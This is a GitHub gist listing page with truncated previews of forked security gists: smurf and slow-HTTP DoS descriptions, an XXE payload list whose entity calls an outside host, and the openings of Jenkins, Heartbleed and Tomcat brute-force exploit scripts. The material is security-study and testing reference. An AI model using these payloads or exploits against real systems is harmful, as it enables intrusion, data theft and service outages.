- https://wizardforcel.gitbooks.io/web-hacking-101/content/ Web Hacking 101 中文版
- https://wizardforcel.gitbooks.io/asani/content/ 浅入浅出Android安全 中文版
- https://wizardforcel.gitbooks.io/lpad/content/ Android 渗透测试学习手册 中文版
- https://wizardforcel.gitbooks.io/kali-linux-web-pentest-cookbook/content/ Kali Linux Web渗透测试秘籍 中文版
- https://github.com/hardenedlinux/linux-exploit-development-tutorial Linux exploit 开发入门
- https://www.gitbook.com/book/t0data/burpsuite/details burpsuite实战指南
- http://www.kanxue.com/?article-read-1108.htm=&winzoom=1 渗透测试Node.js应用
- https://github.com/qazbnm456/awesome-web-security Web安全资料和资源列表
Michael Feng 0x6b7966
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Well, I suppose its `safe' to release this, it seems everyone and their dog has | |
| it and apparantly (and to my surprise) it still works. | |
| The `smurf' attack is quite simple. It has a list of broadcast addresses which | |
| it stores into an array, and sends a spoofed icmp echo request to each of those | |
| addresses in series and starts again. The result is a devistating attack upon | |
| the spoofed ip with, depending on the amount of broadcast addresses used, | |
| many, many computers responding to the echo request. | |
| Before I continue may I first say that this code was a mistake. When it was |
0x6b7966
/ 开源扫描仪的工具箱.md
Created
July 12, 2019 07:22
— forked from ckeyer/开源扫描仪的工具箱.md
0x6b7966
/ AWS Security Resources
Created
July 12, 2019 07:44
— forked from chanj/AWS Security Resources
AWS Security Resources
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| INTRO | |
| I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute. | |
| Short Link: http://tiny.cc/awssecurity | |
| Official AWS Security Resources | |
| * Security Blog - http://blogs.aws.amazon.com/security/ | |
| * Security Advisories - http://aws.amazon.com/security/security-bulletins/ | |
| * Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf | |
| * Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf |
0x6b7966
/ README.md
Created
July 14, 2019 23:52
— forked from FrankSpierings/README.md
Linux Container Escapes and Hardening
-
namespaces - overview of Linux namespaces http://man7.org/linux/man-pages/man7/namespaces.7.html
-
mount_namespaces - overview of Linux mount namespaces
0x6b7966
/ XXE_payloads
Created
July 16, 2019 04:57
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
0x6b7966
/ slow_http_attacks.md
Created
August 7, 2019 07:05
— forked from nielsvanderbeke/slow_http_attacks.md
Slow HTTP Attacks
Slow HTTP attacks are denial-of-service (DoS) attacks in which the attacker sends HTTP requests in pieces slowly, one at a time to a Web server. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. When the server’s concurrent connection pool reaches its maximum, this creates a DoS. Slow HTTP attacks are easy to execute because they require only minimal resources from the attacker.
Attack exploits the fact that most of modern web servers are not limiting the connection duration if there is a data flow going on, and with possiblity to prolong TCP connection virtually forever with zero or minimal data flow by manipulating TCP receive window size value, it is possible to acquire concurent connections pool of the application. Possibility to prolong TCP connection is described in several vulnerability reports: MS09-048, CVE-2008-4609, CVE-2009-1925, CVE-2009-1926 .
Prerequisites for the successful attack are: - victim serve
0x6b7966
/ CVE-2018-1999002.py
Created
September 10, 2019 05:18
— forked from becojo/CVE-2018-1999002.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import os | |
| PLUGIN = 'credentials' | |
| BACKDIR_COUNT = 10 | |
| if len(sys.argv) != 3: | |
| print 'usage:\n\tpython CVE-2018-1999002.py [jenkins base url] [absolute file path]' | |
| print '' |
0x6b7966
/ nginx-status.nse
Created
September 20, 2019 14:35
— forked from johnl/nginx-status.nse
nmap script to check if a service is serving an nginx status page
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| local http = require "http" | |
| local nmap = require "nmap" | |
| local shortport = require "shortport" | |
| local string = require "string" | |
| description = [[ | |
| Detects if the service is serving an nginx status page | |
| ]] | |
| --- |
0x6b7966
/ hb-test.py
Created
September 26, 2019 01:28
— forked from takeshixx/hb-test.py
OpenSSL heartbeat PoC with STARTTLS support.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| """ | |
| Author: takeshix <[email protected]> | |
| PoC code for CVE-2014-0160. Original PoC by Jared Stafford ([email protected]). | |
| Supportes all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP. | |
| """ | |
| import sys,struct,socket | |
| from argparse import ArgumentParser |
0x6b7966
/ tomcat_brute_force.py
Created
November 8, 2019 06:59
— forked from egre55/tomcat_brute_force.py
tomcat_brute_force
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # author: @egre55 | |
| # script to automate the testing of common apache tomcat credentials | |
| #!/usr/bin/env python | |
| import sys | |
| import requests | |
| with open('tomcat-betterdefaultpasslist.txt') as f: | |
| for line in f: |
OlderNewer